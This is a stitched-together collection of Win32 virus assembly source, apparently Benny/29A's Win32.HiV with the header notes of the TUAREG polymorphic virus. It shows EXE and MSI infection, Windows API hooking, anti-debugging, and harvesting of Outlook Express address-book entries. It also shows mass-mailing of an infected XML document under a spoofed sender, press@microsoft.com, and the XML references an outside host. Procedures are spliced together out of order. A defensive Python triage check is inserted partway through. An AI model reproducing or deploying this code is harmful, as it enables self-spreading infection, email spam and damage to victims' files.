call [ebp + a_FindClose - gdelta] ;close search handle
jmp end_seh ;and quit from procedure
sfc_stuff2k EndP
html_stuff Proc
@pushsz 'ADVAPI32'
call [ebp + a_LoadLibraryA - gdelta] ;load ADVAPI32.DLL library
test eax,eax
jne n_load_xml
ret ;quit if error
n_load_xml:
xchg eax,ebx ;EBX = base of ADVAPI32.DLL
@getsz 'RegCreateKeyA',edx
call @get_api ;get address of RegCreateKeyA API
xchg eax,ecx
jecxz end_xml_lib
mov esi,ecx ;ESI = RegCreateKeyA
@getsz 'RegSetValueExA',edx
call @get_api ;get address of RegSetValueA API
xchg eax,ecx
jecxz end_xml_lib
mov edi,ecx ;EDI = RegSetValueExA
@getsz 'RegCloseKey',edx
call @get_api ;get address of RegCloseKey API
xchg eax,ecx
jecxz end_xml_lib
mov [ebp + a_RegCloseKey - gdelta],ecx;save it
;this procedure can copy icon from .html to .xml filez and get path+filename of
;default WAB file
chg_xml_icon:
lea ecx,[ebp + reg_key - gdelta]
push ecx
@pushsz 'htmlfile'
push 80000000h
call esi ;open "HKEY_CLASSES_ROOT\htmlfile"
test eax,eax
pop eax
jne end_xml_reg2 ;quit if error
push eax
@getsz 'RegQueryValueA',edx
call @get_api ;get address of RegQueryValueA API
xchg eax,ecx ;ECX = RegQueryValueA
jecxz end_xml_lib
push esi
push ecx
push 2
push 0
push 0
push dword ptr [ebp + tmp - gdelta]
call edi ;write icon from \htmlfile to \xmlfile
test eax,eax ;error?
pop eax ;get return address
jne end_xml_reg ;quit
jmp eax ;continue
push 0
push ebp
push 1
push 0
@pushsz 'NeverShowExt'
push dword ptr [ebp + tmp - gdelta]
call edi ;create new item - NeverShowExt - this will
test eax,eax ;hide .XML extension under Windows.
pop eax
jne end_xml_lib
jmp eax
push esi
@endsz
dec esi
mov eax,'lmx.'
mov edi,esi
stosd ;create .XML extension
xor al,al
stosb
pop ebx
g_xml: call Create_FileA ;create .HTML.XML file
xchg eax,edi
inc edi
je end_infect_html
dec edi
push 0
call @wftmp
dd ?
@wftmp: push end_xml-start_xml
call end_xml
start_xml: ;start of "infected" XML document
db '<?xml version="1.0"?>'
db '<?xml:stylesheet type="text/xsl" href="http://coderz.net/benny/viruses/press.txt"?>'
db '<i>'
end_xml:push edi
call [ebp + a_WriteFile - gdelta] ;write first part of XML document
push 0
lea ebx,[ebp + @wftmp-4 - gdelta]
push ebx
push szMsg-1-p_msg
lea eax,[ebp + p_msg - gdelta]
push eax
push edi
call [ebp + a_WriteFile - gdelta] ;write message to XML document
push 0
push ebx
push 4
call @endxml
db '</i>'
@endxml:push edi
call [ebp + a_WriteFile - gdelta] ;and final tag
push edi
call [ebp + a_CloseHandle - gdelta] ;close file
end_infect_html:
popad ;restore all registers
ret ;and quit - HTML is now infected :)
html_stuff EndP
;this procedure can send "infected" XML document to 5 mail addresses via MAPI32
mapi_stuff Proc
pushad
call @i_html ;generate XML file
@getsz 'MAPILogon',edx
call @get_api ;get address of MAPILogon API
test eax,eax
je end_mapi
xchg eax,esi ;ESI - address of MAPILogon
@getsz 'MAPILogoff',edx
call @get_api ;get address of MAPILogoff API
test eax,eax
je end_mapi
xchg eax,edi ;EDI - address of MAPILogoff
@getsz 'MAPISendMail',edx
call @get_api ;get address of MAPISendMail API
test eax,eax
je end_mapi
mov [ebp + a_MAPISendMail - gdelta],eax
;save it
xor edx,edx
lea eax,[ebp + tmp - gdelta];mapi session ptr
push eax
push edx
push edx
lea eax,[ebp + nextPID-1 - gdelta]
push eax
push eax
push edx
call esi ;log on to MAPI32
test eax,eax
jne end_mapi
push 5
pop eax ;number of recipients
stosd
lea eax,[ebp + MsgTo - gdelta]
stosd ;recipients
xor eax,eax
inc eax
stosd
lea eax,[ebp + MAPIFileDesc - gdelta]
stosd
add edi,4*2
lea eax,[ebp + nextPID-1 - gdelta]
stosd
@getsz 'press@microsoft.com',eax
stosd ;sender
add edi,4*2
push 5
pop ecx
xor eax,eax
msgTo: stosd ;0
inc eax
stosd ;1
dec eax
stosd ;0
imul eax,ecx,22h
lea eax,[eax + ebp + mails - gdelta-22h]
stosd ;get next email address from WAB - recipient
xor eax,eax
stosd ;0
stosd ;0
loop msgTo ;5 timez
add edi,4*3
xor eax,eax
push eax
push eax
lea ecx,[ebp + MAPIMessage - gdelta]
push ecx ;message
push eax
push dword ptr [ebp + tmp - gdelta]
mov eax,12345678h
a_MAPISendMail = dword ptr $-4
call eax ;send E-MAIL !
pop edi
xor eax,eax
push eax
push eax
push eax
push dword ptr [ebp + tmp - gdelta]
call edi ;close MAPI session
end_mapi:
push ebx
call [ebp + a_FreeLibrary - gdelta] ;unload MAPI32.DLL
popad ;restore all registers
ret ;and quit from procedure
mapi_stuff EndP
;this procedure can get 5 e-mail addresses from Outlook Express'es default
;address-book - .WAB file
wab_parse Proc
pushad ;store all registers
@SEH_SetupFrame <jmp end_seh>
;setup SEH frame
lea ebx,[ebp + wab_buffer - gdelta]
call Create_FileA ;open WAB file
inc eax
je end_seh ;quit if error
dec eax
mov [ebp + wFile - gdelta],eax
;store handle
call Create_FileMappingA
xchg eax,ecx ;create file mapping object
jecxz end_wfile
mov [ebp + wMapFile - gdelta],ecx
;store handle
call Map_ViewOfFile ;map view of file to our address space
xchg eax,ecx
jecxz end_wmfile
mov [ebp + wlpFile - gdelta],ecx
jmp next_wab ;save handle
end_wab:push 12345678h
wlpFile = dword ptr $-4 ;unmap view of file
call [ebp + a_UnmapViewOfFile - gdelta]
end_wmfile:
push 12345678h
wMapFile = dword ptr $-4 ;close file mapping object
call [ebp + a_CloseHandle - gdelta]
end_wfile:
push 12345678h
wFile = dword ptr $-4 ;close file
call [ebp + a_CloseHandle - gdelta]
jmp end_seh ;quit from procedure
next_wab:
mov esi,[ecx+60h] ;get to e-mail addresses array
add esi,ecx ;make RAW pointer
lea edi,[ebp + mails - gdelta] ;buffer for 5 mail addresses
xor ebx,ebx ;EBX - 0
push 5
pop ecx ;ECX - 5
m_loop: call parse_wab ;get one e-mail address
add esi,44h ;get to next record
loop m_loop ;ECX timez
jmp end_wab ;and quit
parse_wab:
push ecx ;store registers
push esi ;...
push 22h
pop ecx ;up to 22 characters
r_mail: lodsw ;get unicode character
stosb ;save ANSI character
dec ecx ;decrement counter
test al,al ;end of string?
jne r_mail ;no, continue
add edi,ecx ;yep, correct EDI
pop esi ;restore registers
pop ecx ;...
ret ;and quit
wab_parse EndP
;this procedure can check if the virus is debugged and if so, it can restart
;computer (Win98) or terminate current process (Win2k)
debug_stuff Proc
pushad
;Now we have to get the size of K32 in another process. We use the trick
;-> we will search through the address space for the end of K32 in memory
;and then we will subtract the base address from that value, so we will
;get the size
start_parse:
push mbi_size
lea eax,[ebp + mbi - gdelta] ;MBI structure
push eax
push esi
push ebx ;get information about
call [ebp + a_VirtualQueryEx - gdelta]
test eax,eax ;address space
je end_K32_patching ;quit if error
;is memory committed?
test dword ptr [ebp + reg_state - gdelta],MEM_COMMIT
je end_parse ;quit if not, end of K32 found
mov eax,[ebp + reg_size - gdelta] ;get size of region
add [ebp + k32_size - gdelta],eax ;add the size to variable
add esi,eax ;make new address
jmp start_parse ;and parse again
end_parse:
sub esi,[ebp + k32_base - gdelta] ;correct to size and save it
mov [ebp + k32_size - gdelta],esi ;(size=k32_end - k32_start)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push esi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate enough space
test eax,eax ;for K32 in our process
je end_K32_patching
xchg eax,edi
mov [ebp + k32_copy - gdelta],edi ;save the address
push PAGE_EXECUTE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virus_size
push 0 ;allocate enough space
push ebx ;for virus code in
call [ebp + a_VirtualAllocEx - gdelta] ;victim process
test eax,eax
je end_K32_dealloc ;quit if error
mov [ebp + virus_base - gdelta],eax ;save the address
push crcResCount
pop ecx ;count of APIz to hook
make_res:
pushad ;store all registers
mov eax,edi
lea esi,[ebp + crcRes - gdelta + (ecx*4)-4] ;get API
call get_api ;get address of API
test eax,eax
je end_res ;quit if error
push eax
mov edx,[ebp + posRes - gdelta + (ecx*4)-4] ;get ptr to variable which
sub eax,[ebp + k32_copy - gdelta] ;holds the address to old
add eax,[ebp + k32_base - gdelta] ;API
mov [edx],eax ;store address there
pop eax ;get address to EAX
push eax
sub eax,[ebp + k32_copy - gdelta] ;calculate api_hooker address
add eax,[ebp + k32_base - gdelta] ;...
mov esi,eax ;...
mov eax,0 ;base address of virus
virus_base = dword ptr $-4 ;in memory
add eax,[ebp + newRes - gdelta + (ecx*4)-4] ;add address of api_hooker
sub eax,5 ;subtract the size of JMP
sub eax,esi ;subtract dest_address
pop esi
mov byte ptr [esi],0E9h ;write JMP opcode
mov [esi+1],eax ;write JMP address
end_K32_dealloc:
push MEM_DECOMMIT
push dword ptr [ebp + k32_size - gdelta]
push 12345678h
k32_copy = dword ptr $-4
call [ebp + a_VirtualFree - gdelta] ;now we have to decommit
;our memory
push MEM_RELEASE
push 0
push dword ptr [ebp + k32_copy - gdelta]
call [ebp + a_VirtualFree - gdelta] ;and de-reserve, now our
;buffer doesnt exist
end_K32_patching:
push ebx
call [ebp + a_CloseHandle - gdelta] ;close the handle of process
jmp pid_loop ;and look for another one
searchThread EndP
mov esi,[esp.cPushad+16]
push esi
push dword ptr [esp.cPushad+16]
call edi ;call API
inc eax
je end_ffa
dec eax
call CheckInfect ;no error, try to infect found file
end_ffa:mov [esp.Pushad_eax+8],eax
pop edi
pop esi
movsd ;write back <JMP newFindFirstFileA>
movsb
popad ;restore all registers
ret 8 ;and quit with 2 params on the stack
newFindFirstFileA EndP
;this procedure is used by API hookerz - it can create WFD structure and call
;CheckInfect procedure (this proc needs WFD struct)
xCheckInfect Proc
call $+5
xdelta: pop ebp ;get delta offset
lea esi,[ebp + WFD - xdelta]
push esi ;WFD struct
push dword ptr [esp.cPushad+16] ;ptr to filename
call [ebp + a_FindFirstFileA - xdelta] ;find file
inc eax
je end_xci ;quit if error
dec eax
call CheckInfect ;infect file
push eax
call [ebp + a_FindClose - xdelta] ;close search handle
end_xci:ret ;and quit
xCheckInfect EndP
xchg eax,ebx
push MAX_PATH
lea esi,[ebp + reg_buffer - igd]
push esi
push 0 ;get path+filename of current process
call [ebp + a_GetModuleFileNameA - igd]
@pushsz 'FtpPutFileA'
push eax ;get address of FtpPutFileA API
call [ebp + a_GetProcAddress - igd]
xchg eax,ecx
jecxz endICA ;quit if error
unload_lib:
push edi
call [ebp + a_FreeLibrary - gd]
@pushsz 'SfcIsFileProtected'
push edi
call [ebp + a_GetProcAddress - gd]
test eax,eax ;get the pointer to API
je un_sfc
push FILE_ATTRIBUTE_NORMAL
push ebx
call [ebp + a_SetFileAttributesA - gd]
dec eax ;blank file attributes
jne end_seh
mov ebx,[esi.WFD_nFileSizeLow]
add ebx,virus_size ;new file size to EBX
mov [ebp + mapped_file_size - gd],ebx
cdq
push edx
push ebx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + a_CreateFileMappingA - gd]
xchg eax,ecx ;create file mapping object
jecxz end_cfile ;quit if error
mov [ebp + hMapFile - gd],ecx
;save handle
push ebx
push 0
push 0
push FILE_MAP_WRITE
push ecx
call [ebp + a_MapViewOfFile - gd]
xchg eax,ecx ;map view of file to our address space
jecxz end_mfile ;quit if error
mov [ebp + lpFile - gd],ecx ;save handle
jmp n_open ;and continue
end_file:
popad
push 12345678h
lpFile = dword ptr $-4 ;unmap view of file
call [ebp + a_UnmapViewOfFile - gd]
end_mfile:
push 12345678h
hMapFile = dword ptr $-4 ;close file mapping object
call [ebp + a_CloseHandle - gd]
end_cfile:
mov ecx,12345678h ;infection succeed?
cut_or_not = dword ptr $-4
jecxz no_cut ;yeah, dont truncate file
close_file:
push 12345678h
hFile = dword ptr $-4 ;close file
call [ebp + a_CloseHandle - gd]
end_attr:
lea eax,[esi.WFD_szFileName]
push [esi.WFD_dwFileAttributes]
push eax ;set back file attributes
call [ebp + a_SetFileAttributesA - gd]
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;restore all registers
ret ;and quit from procedure
;this procedure will try to NTFS-compress infected file and add new stream
ntfs_stuff Proc
push 0
lea eax,[ebp + tmp - gd]
push eax
push 0
push 0
push 4
call in_buf
dd 1 ;default compression
in_buf: push 09C040h ;compress code
push dword ptr [ebp + hFile - gd]
call [ebp + a_DeviceIoControl - gd] ;compress infected file!
push 0
lea eax,[ebp + tmp - gd]
push eax
push szMsg-1-p_msg
lea eax,[ebp + p_msg - gd]
push eax
push ebx
call [ebp + a_WriteFile - gd] ;copy message to new stream
push ebx
call [ebp + a_CloseHandle - gd] ;close stream
jmp close_file ;and close whole file
ntfs_stuff EndP
check_msi:
cmp [ecx],0E011CFD0h ;is it MSI signature?
jne end_file ;no, quit
cmp [ecx+4],0E11AB1A1h ;is it MSI signature?
jne end_file ;no, quit
parse_msi:
call mz_search ;search for EXE file inside MSI
test ecx,ecx
je end_file ;no files found, quit...
mov ebx,ecx
add ebx,[ecx.MZ_lfanew]
got_epo:mov eax,[edi.SH_VirtualAddress]
add eax,[edi.SH_SizeOfRawData] ;calculate RVA of virus beginning
mov ecx,esi
sub ecx,[esp.Pushad_ecx]
sub ecx,[edx.SH_PointerToRawData]
add ecx,[edx.SH_VirtualAddress] ;calculate RVA of JMP opcode
or dword ptr [edx.SH_Characteristics],IMAGE_SCN_MEM_WRITE
;set WRITE flag to .CODE section
mov edi,esi
mov esi,ecx
sub esi,5
sub edi,5
add esi,[ebx.NT_OptionalHeader.OH_ImageBase]
mov ebx,12345678h
enc_key = dword ptr $-4
mov [ebp + decr_key - gd],ebx ;save encryption key
and dword ptr [ebp + enc_key - gd],0 ;nullify encryption key variable
mov ecx,8192
mov esi,[ebp + file_buffer - gd]
rep movsb ;and last 8192 of host code
@pushsz 'Imagehlp'
@imghlp:call [ebp + a_LoadLibraryA - gd]
test eax,eax ;load IMAGEHLP.DLL
je no_csum ;quit if error
xchg eax,edi
@pushsz 'CheckSumMappedFile'
push edi
call [ebp + a_GetProcAddress - gd]
test eax,eax ;get address of CheckSumMappedFile API
je un_csum ;quit if error
lea ecx,[ebx.NT_OptionalHeader.OH_CheckSum]
push ecx ;where to store new checksum
call $+9
dd ? ;old checksum
push 12345678h ;size of infected file
mapped_file_size = dword ptr $-4
push dword ptr [ebp + lpFile - gd]
call eax ;calculate new checksum
push edi
mov edi,[edx+ebx+IMAGE_SIZEOF_FILE_HEADER+4]
cmp edi,'xet.' ;is the first section ".text"?
je cc_msi
cmp edi,'EDOC' ;or ".CODE"?
je cc_msi
pop edi ;no, quit
ret
cc_msi: pop edi
mov ecx,[ebx.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov eax,ecx
sub eax,[ebx+edx+SH_VirtualAddress+IMAGE_SIZEOF_FILE_HEADER+4]
;get entrypoint RVA to EAX
push eax
mov eax,ecx
mov [ebp + msi_entrypoint - gd],eax ;save old entrypoint
mov eax,[ebx.NT_OptionalHeader.OH_ImageBase]
add [ebp + msi_entrypoint - gd],eax ;in RAW format
pop eax
push esi
sub esi,edi
sub esi,eax ;set new entrypoint
add [ebx.NT_OptionalHeader.OH_AddressOfEntryPoint],esi
pop edi
no_cave_found:
popad ;no cave inside EXE file found,
ret ;restore all registers and quit
CheckInfect EndP
;this procedure can allocate memory (8192 bytes)
mem_alloc:
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push 8192
push 0
call [ebp + a_VirtualAlloc - gd]
ret
push MEM_RELEASE
push 0
push esi
call [ebp + a_VirtualFree - gd]
ret
;this procedure can create file mapping object - used in non-resident mode
;input: EAX - opened handle of file
Create_FileMappingA Proc
cdq
push edx
push edx
push edx
push PAGE_READWRITE
push edx
push eax
call [ebp + a_CreateFileMappingA - gdelta]
ret
Create_FileMappingA EndP
push 10
pop ecx
g_str: xor edx,edx
div ecx
add edx,'0'
xchg eax,edx
stosb
xchg eax,edx
test eax,eax
jne g_str
pop esi
xchg esi,edi
dec esi
cpy_num:std
lodsb
cld
stosb
cmp al,11h
jne cpy_num
dec edi
xor al,al
stosb
pop esi
ret
Num2Ascii EndP
;this is MSI loader - virus places this procedure into EXE files inside MSIs
msi_start Proc
pushad
call mdelta
mdelta: pop ebp ;get delta offset
call get_base ;get base of K32
test eax,eax
je end_msi
push eax
call crc32m1
dd 04134D1ADh ;LoadLibraryA
dd 0AFDF191Fh ;FreeLibrary
dd 0FFC97C1Fh ;GetProcAddress
crc32m1:pop esi
call get_api ;get addresses of these APIs
xchg eax,ecx
pop eax
test ecx,ecx
je end_msi
push eax
add esi,4
call get_api ;...
xchg eax,edi
test edi,edi
pop eax
je end_msi
add esi,4
push eax
call get_api ;...
xchg eax,edx
test edx,edx
pop eax
je end_msi
push edx
@pushsz 'USER32'
call ecx ;load USER32.DLL library
xchg eax,esi
test esi,esi
pop edx
je end_msi
@pushsz 'MessageBoxA'
push esi
call edx ;get address of MessageBoxA API
xchg eax,ecx
test ecx,ecx
je freelib
push 1000h
@pushsz '[Win32.HiV] by Benny/29A'
szTitle:call szMsg
p_msg: db 'This cell has been infected by HIV virus, generation: '
gcount: db '0000000000',0
szMsg: push 0
call ecx ;show lame message :)
freelib:push esi
call edi ;unload USER32.DLL
end_msi:popad
mov eax,offset ExitProcess
msi_entrypoint = dword ptr $-4
jmp eax ;and quit to host
;CRC32s of APIz
crc32s: dd 0DCF6E06Ch ;GetEnvironmentVariableA
dd 033D350C4h ;OpenProcess
dd 068624A9Dh ;CloseHandle
dd 019F33607h ;CreateThread
dd 079C3D4BBh ;VirtualProtect
dd 0FFC97C1Fh ;GetProcAddress
dd 04A27089Fh ;ReadProcessMemory
dd 00E9BBAD5h ;WriteProcessMemory
dd 056E1B657h ;VirtualProtectEx
dd 0D4AFA114h ;VirtualQueryEx
dd 04402890Eh ;VirtualAlloc
dd 02AAD1211h ;VirtualFree
dd 0DA89FC22h ;VirtualAllocEx
dd 03C19E536h ;SetFileAttributesA
dd 08C892DDFh ;CreateFileA
dd 096B2D96Ch ;CreateFileMappingA
dd 0797B49ECh ;MapViewOfFile
dd 094524B42h ;UnmapViewOfFile
dd 085859D42h ;SetFilePointer
dd 059994ED6h ;SetEndOfFile
dd 04B2A3E7Dh ;SetFileTime
dd 0CC09D51Eh ;DeviceIoControl
dd 0AE17EBEFh ;FindFirstFileA
dd 0AA700106h ;FindNextFileA
dd 0C200BE21h ;FindClose
dd 04134D1ADh ;LoadLibraryA
dd 0AFDF191Fh ;FreeLibrary
dd 021777793h ;WriteFile
dd 0DE256FDEh ;DeleteFileA
dd 004DCF392h ;GetModuleFileNameA
dd 082B618D4h ;GetModuleHandleA
dd 052E3BEB1h ;IsDebuggerPresent
dd 0EF7D811Bh ;GetFileSize
dd 054D8615Ah ;ReadFile
crc32c = ($-crc32s)/4 ;number of APIz
db 11h
end_virus: ;end of virus in file
dec_buff db 10 dup (?)
align 4
a_apis: ;addresses of APIs
a_GetEnvironmentVariableA dd ?
a_OpenProcess dd ?
a_CloseHandle dd ?
a_CreateThread dd ?
a_VirtualProtect dd ?
a_GetProcAddress dd ?
a_ReadProcessMemory dd ?
a_WriteProcessMemory dd ?
a_VirtualProtectEx dd ?
a_VirtualQueryEx dd ?
a_VirtualAlloc dd ?
a_VirtualFree dd ?
a_VirtualAllocEx dd ?
a_SetFileAttributesA dd ?
a_CreateFileA dd ?
a_CreateFileMappingA dd ?
a_MapViewOfFile dd ?
a_UnmapViewOfFile dd ?
a_SetFilePointer dd ?
a_SetEndOfFile dd ?
a_SetFileTime dd ?
a_DeviceIoControl dd ?
a_FindFirstFileA dd ?
a_FindNextFileA dd ?
a_FindClose dd ?
a_LoadLibraryA dd ?
a_FreeLibrary dd ?
a_WriteFile dd ?
a_DeleteFileA dd ?
a_GetModuleFileNameA dd ?
a_GetModuleHandleA dd ?
a_IsDebuggerPresent dd ?
a_GetFileSize dd ?
a_ReadFile dd ?
mbi: dd ? ;MEMORY_BASIC_INFORMATION
dd ? ;structure needed by
dd ? ;VirtualQueryEx API
reg_size dd ? ;number of pages with same rights*size of one page
reg_state dd ? ;state of page(s)
dd ?
dd ?
mbi_size = dword ptr $-mbi
CSE: pushad
lodsb ; AL = byte within search area
reset_cavity_loop:
xchg eax,ebx ; BL = " " " "
xor edx,edx ; Zero EDX
dec ecx ; Decrease counter
jecxz no_cave_found ; Zero ECX? Jump to no_cave_found
find_cave_loop:
lodsb ; AL = byte within search area
cmp al,bl ; Current byte equal to previous byte?
jne reset_cavity_loop ; Not equal? Jump to reset_cavity_loop
inc edx ; Increase number of bytes found in
; cave
cmp edx,msi_end-msi_start ; Found a cave large enough?
jne find_cave_loop ; Not equal? Jump to find_cave_loop
sub esi,msi_end-msi_start ; ESI = pointer to cave
mov [esp.Pushad_esi],esi
popad
;-----------------------------------------------------------------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CSE.INC]ÄÄÄ
;;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;;ßßÛßßß Û ÛßßÛ ÛßÛÜ Ûßßß Ûßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
;;Þ Û Û Û Û Û Û ÜÛ Û Û ÄÄÄÄÄÄÄÄÄ Designed to carry the ÄÄÄÄÄ Ý Þ ÜÝ ÞßÝÜÝ
;;Þ Û Û Û ÛßßÛ ÛßÛÜ Ûßß Û ßÛ ÄÄÄ TUAREG polymorphing engine ÄÄÄ Þ Ý Ý ÜÝ Ý
;;Þ Û ÛÜÜÛ Û Û Û Û ÛÜÜÜ ÛÜÜÛ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Û ÝÜÞÜÜ Ý
;;Þ ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
;;Þ
;;ÞÝ ßßÛßß ÛÛ ÞÛ ÛÜÜ Ý ÞÛßÝ Þ Ý Û ÞßßÝ ÞßßÛ ÞßßÝ
;;ÞÝ ÛÞ ÛÞ ÝÛ ÞÝ Ý ÞÝ ÞÝ ßÞ Ý ÞÝ Û Û Û Þ Û Û
;;ÞßÝÝ Ý ÝÞßÛÞÛÝ Ý Û ÝÞÛÝÛßÛÞ ßßÝÝ Þ Þ ÛßÞÞ ÝÞÛÝÞÛß Û Þ ßßÛ ÛßßÛ
;;ÞÜÝÛÜÝ ÝÞ ÞÞÜÜ Ý ÝÞÜÜÞ ÞÞ ÛÛÝÛ ÞÜÜÝ Ý ÞÞÝÛÞÜÜÞ ÞÝ ÜÛÛÜÜ ÜÜÛÞÝ ÞÝ
;;ÄÄÄÄÄÝÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;; ßß
;; This virus is designed to carry the Tameless Unpredictable Anarchic
;; Relentless Encryption Generator (TUAREG), so I decided to name the virus
;; after the engine. Apart from generating extremely polymorphic samples, the
;; virus does other things besides carrying the engine.
;;
;; This is version 1.21. Version 1.0 was sent to AVers before the release of
;; this version in 29A#5, so I have had time to improve some things, correct
;; some bugs and add new features, like more complex garbage in the decryptors,
;; the routine for zeroing the memory before the program terminates, etc.
;; Version 1.1 was sent too, but too late I realized there was a "bug" in the
;; infection procedure (but NOT in the TUAREG) that made some programs refuse
;; to execute, so I corrected some lines of code, added some others, improved
;; the TUAREG engine greatly (now it's v1.01), and all that together I call
;; "TUAREG v1.21".
;;
;; In this version:
;; Virus total binary size: 20994 bytes
;; Infection virtual and physical size: 65536 bytes
;; Binary size of TUAREG: 12951 bytes (only main engine)
;; Average size of a generated decryptor: 9.26 Kb
;;
;; Technical notes:
;;------------------
;; - It infects all *.EXEs, *.SRCs and *.CPLs in the current, windows and
;; windows\system directories, and the programs set for execution at
;; windows startup.
;;
;; - It's also a per-process resident, patching the following functions:
;; GetProcAddress, CreateFileA, CreateProcessA, FindFirstFileA,
;; FindNextFileA, GetFileAttributesA, SetFileAttributesA, GetFullPathNameA,
;; MoveFileA, CopyFileA, DeleteFileA, WinExec, _lopen, MoveFileExA and
;; OpenFile. ExitProcess is also patched, but for special actions.
;;
;; - The RVAs of the functions are obtained by scanning the export directory
;; of KERNEL32, computing a checksum of the name of every function and
;; comparing it with the checksums stored in the virus. When one matches,
;; the corresponding RVA is set in the virus' calling address.
;;
;; - On infection, it'll place the generated decryptors in the .text section,
;; and the .reloc section will be annulled, renamed and overwritten with
;; the encrypted data and the overwritten code of .text. If it's not big
;; enough, its size will be increased until all the stuff fits in it. If
;; there isn't any .reloc section, then a new section with a random name
;; will be added (if there is enough space in the EXE header).
;;
;; - So the infection mark is this: if there's a .reloc section, the file
;; isn't infected, and neither is it if the .rsrc section is the last one. If
;; the .rsrc section isn't the last section of all, the file won't be
;; infected, since it could be already. I know it isn't the best system, but
;; I was tired of coding :). In the future I'll do a less noticeable
;; infection.
;;
;; - The virus is polymorphic, using the TUAREG. Moreover, a little decryptor
;; that is also polymorphic (to avoid cryptanalysis) has been added. It's not
;; as polymorphic as the TUAREG-generated ones (well, compared to the TUAREG
;; generated decryptors, the little one shouldn't even be called "a
;; decryptor" :), but well...
;;
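;; The infection mark described in the notes above can be turned into a triage
;; check from the defender's side. The Python below is an added example, not
;; part of the virus or of any 29A code: it parses a PE section table with the
;; standard library only and reports whether a file has the layout the author
;; says an infected file ends up with (no .reloc section, .rsrc not last). The
;; PE it builds for testing is a constructed header with no code, so the check
;; runs offline.

```python
import struct

SECTION_HEADER_SIZE = 40   # sizeof(IMAGE_SECTION_HEADER)
COFF_HEADER_SIZE = 20      # sizeof(IMAGE_FILE_HEADER)


def parse_section_names(pe: bytes) -> list:
    """Return the section names of a PE image in file order.

    Only the headers are read; the image need not be complete.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (size_opt,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + COFF_HEADER_SIZE + size_opt
    names = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        raw = pe[off:off + 8]
        if len(raw) < 8:
            raise ValueError("section table truncated")
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    return names


def tuareg_mark_status(names: list) -> str:
    """Apply the author's infection mark to a list of section names.

    'not-infected-by-mark': the author's rule says a file that still has a
    .reloc section, or whose .rsrc section is the last one, has not been
    infected by this virus.  'candidate': the layout an infected file ends
    up with (no .reloc, and some section after .rsrc).
    """
    if ".reloc" in names:
        return "not-infected-by-mark"
    if names and names[-1] == ".rsrc":
        return "not-infected-by-mark"
    return "candidate"


def triage(pe: bytes) -> str:
    """Parse the headers and classify the file by the infection mark."""
    return tuareg_mark_status(parse_section_names(pe))


def build_test_pe(section_names: list) -> bytes:
    """Constructed minimal PE header (no optional header, no code) for tests."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0 (test only), Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    sections = b"".join(
        n.encode("ascii").ljust(8, b"\0") + b"\0" * (SECTION_HEADER_SIZE - 8)
        for n in section_names
    )
    return dos + b"PE\0\0" + coff + sections


if __name__ == "__main__":
    for layout in ([".text", ".data", ".rsrc", ".reloc"],
                   [".text", ".data", ".rsrc"],
                   [".text", ".data", ".rsrc", "qx7k"]):
        print(layout, "->", triage(build_test_pe(layout)))
```

;; Many clean executables are linked without a .reloc section, so a
;; "candidate" verdict only selects files for closer inspection (entry point
;; inside .text, checksum, section names); it is not a detection by itself.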
;; Notes about the TUAREG
;;--------------------------
;; TUAREG has been a never-ending project practically since I entered the
;; virus scene. My initial releases didn't resemble the result (this one) in
;; any way, but in spite of that, I'm thousands of times prouder of this
;; result than ever, since I didn't expect such complexity after such easy
;; coding of it (well, not sooooo easy, but it was not like coding the
;; MeDriPolEn, where there were things that I didn't know what they did,
;; although they worked well :), but here I knew at every moment what was
;; expected from every portion of code).
;; After correcting some little bugs (and some not so little, but obscure
;; ones), I was very surprised with the result. Oh, errmh... if I explain
;; first what the engine does, maybe the explanations will be easier :). So
;; let's see:
;;
;; - The TUAREG is based on two main techniques that I explain in the article
;; called "Advanced decryptor construction", which are PRIDE and Branching.
;; PRIDE (Pseudo-Random Index DEcryption) avoids linear decryption, looking
;; like a normal application's access to its own data, and Branching avoids
;; the linear execution of a decryption loop, since it can execute sixteen
;; different kinds of code that perform exactly the same action, so there
;; isn't any way of knowing the behaviour of the engine (which path it is
